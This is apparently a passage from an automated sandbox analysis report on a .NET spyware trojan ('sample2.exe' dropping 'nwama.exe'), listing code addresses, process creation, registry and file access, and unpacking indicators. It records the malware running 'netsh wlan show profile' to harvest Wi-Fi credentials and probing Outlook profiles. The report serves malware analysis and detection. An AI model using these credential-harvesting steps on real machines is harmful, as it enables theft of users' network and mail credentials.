                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541E43
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542E07
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654863A
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654222D
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065422D5
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542EFA
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541EEB
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541E97
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06547280
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542281
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06543281
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542EA3
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06548AAC
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06548AA9
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542B4F
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06547378
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654236E
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542710
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06545F10
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654331D
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541FD8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065423C2
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542BFD
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542FED
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542F96
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541F84
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542BA6
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542C54
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06543044
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06545C43
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654E848
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06545070
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542416
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06548017
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654202C
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065420D4
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065464D8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065430F2
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541CF3
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065428EF
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541C9F
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654309B
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542080
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065424AF
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06540717
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542CAB
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542D59
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541D47
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06543149
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542D02
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06545102
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654393A
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542128
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065479F8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065431E5
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065479E7
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541DEF
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541D9B
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654258F
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542188
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06542DB0
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_00EE3EF3
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_007C2379
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05010928
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05012D88
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_050145C0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_050125E8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05019A17
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_0501AE18
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_050136D0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05015108
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05012555
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05014591
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_050125A1
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05012DC8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05016400
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05016410
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05016839
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05015C60
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05015C70
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05019C90
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05019CA0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_050144BB
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_050154F2
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_0501CF50
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_0501DFD0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05016220
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05016230
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_0501666A
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05016678
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05015292
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05015298
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05011AE0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_0501A2E7
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_0501A2F8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05015EF8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_007C3EF3
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_00AE2379
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A8AB8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A0717
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A83C0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1C6F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A5088
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A4950
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A222D
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A7A00
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2E07
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A8642
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1E43
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2EA3
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A8AB4
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A7288
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2281
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A3281
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1E97
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1EEB
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2EFA
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A22D5
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A331D
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2710
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A236E
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2B4F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2BA6
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A7380
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1F84
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2F96
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2FED
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2BFD
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A23C2
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1FD8
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A202C
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A801F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2416
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A5078
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A3044
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062AE850
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2C54
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2CAB
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A0717
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A24AF
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2080
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A309B
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1C9F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A28EF
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A64E0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A30F2
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1CF3
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A20D4
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2128
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A393A
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A493F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A510A
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2D02
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A3149
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1D47
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2D59
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2DB0
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A2188
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A258F
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1D9B
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A1DEF
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A79EF
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A31E5
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_00AE3EF3
                  Source: sample2.exeBinary or memory string: OriginalFilename vs sample2.exe
                  Source: sample2.exe, 00000000.00000002.665736666.0000000006290000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDefender Protect.dllB vs sample2.exe
                  Source: sample2.exe, 00000000.00000000.641747188.0000000000592000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamezEzEVogzGVZLHnuzSL.exe> vs sample2.exe
                  Source: sample2.exe, 00000000.00000002.661861944.0000000003D5A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameZDSzqrTJuDfzMqxLEyQzcgIBdWeNZukRqLeO.exe4 vs sample2.exe
                  Source: sample2.exe, 00000000.00000002.667266340.0000000006CA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs sample2.exe
                  Source: sample2.exe, 00000000.00000002.658005987.0000000000DCA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs sample2.exe
                  Source: sample2.exeBinary or memory string: OriginalFilename vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.987673444.000000000044C000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameZDSzqrTJuDfzMqxLEyQzcgIBdWeNZukRqLeO.exe4 vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.987712878.0000000000EE2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamezEzEVogzGVZLHnuzSL.exe> vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.997574179.0000000005770000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewbemdisp.tlbj% vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.999576706.0000000006670000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.999762206.00000000066D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.999470130.0000000006600000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs sample2.exe
                  Source: sample2.exe, 00000001.00000002.997991959.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs sample2.exe
                  Source: sample2.exeBinary or memory string: OriginalFilenamezEzEVogzGVZLHnuzSL.exe> vs sample2.exe
                  Source: sample2.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: sample2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: nwama.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: 1.2.sample2.exe.400000.0.unpack, nhx.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 1.2.sample2.exe.400000.0.unpack, nhx.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 11.2.nwama.exe.400000.0.unpack, nhx.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.nwama.exe.400000.0.unpack, nhx.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 18.2.nwama.exe.400000.0.unpack, nhx.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 18.2.nwama.exe.400000.0.unpack, nhx.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/10@3/2
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_06D1051A AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_06D104E3 AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0163B1E6 AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0163B1AF AdjustTokenPrivileges,
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_06A6051A AdjustTokenPrivileges,
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_06A604E3 AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\sample2.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\sample2.exe.logJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeMutant created: \Sessions\1\BaseNamedObjects\KXEawVjqkPnOFR
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:900:120:WilError_01
                  Source: C:\Users\user\Desktop\sample2.exeFile created: C:\Users\user\AppData\Local\Temp\nwamaJump to behavior
                  Source: sample2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\sample2.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\sample2.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\Desktop\sample2.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\Desktop\sample2.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\sample2.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\Desktop\sample2.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\Desktop\sample2.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\sample2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\sample2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\sample2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\sample2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\sample2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: sample2.exeMetadefender: Detection: 25%
                  Source: sample2.exeReversingLabs: Detection: 80%
                  Source: C:\Users\user\Desktop\sample2.exeFile read: C:\Users\user\Desktop\sample2.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\sample2.exe 'C:\Users\user\Desktop\sample2.exe'
                  Source: unknownProcess created: C:\Users\user\Desktop\sample2.exe {path}
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe 'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe 'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
                  Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\sample2.exeProcess created: C:\Users\user\Desktop\sample2.exe {path}
                  Source: C:\Users\user\Desktop\sample2.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe {path}
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\Desktop\sample2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\sample2.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                  Source: C:\Users\user\Desktop\sample2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: sample2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: C:\Users\user\Desktop\sample2.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                  Source: sample2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\Users\Vendetta\source\repos\Defender Protect\Defender Protect\obj\Debug\Defender Protect.pdb source: sample2.exe, 00000000.00000002.665736666.0000000006290000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.720529552.0000000002F86000.00000004.00000001.sdmp, nwama.exe, 0000000F.00000002.736332738.00000000031A6000.00000004.00000001.sdmp
                  Source: Binary string: mscorrc.pdb source: sample2.exe, 00000000.00000002.667266340.0000000006CA0000.00000002.00000001.sdmp, sample2.exe, 00000001.00000002.999576706.0000000006670000.00000002.00000001.sdmp, nwama.exe, 0000000A.00000002.725183141.00000000069F0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.1000299165.0000000006510000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.740831894.0000000006B60000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.998659429.0000000005F50000.00000002.00000001.sdmp

                  Data Obfuscation:

                  barindex
                  .NET source code contains potential unpackerShow sources
                  Source: sample2.exe, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
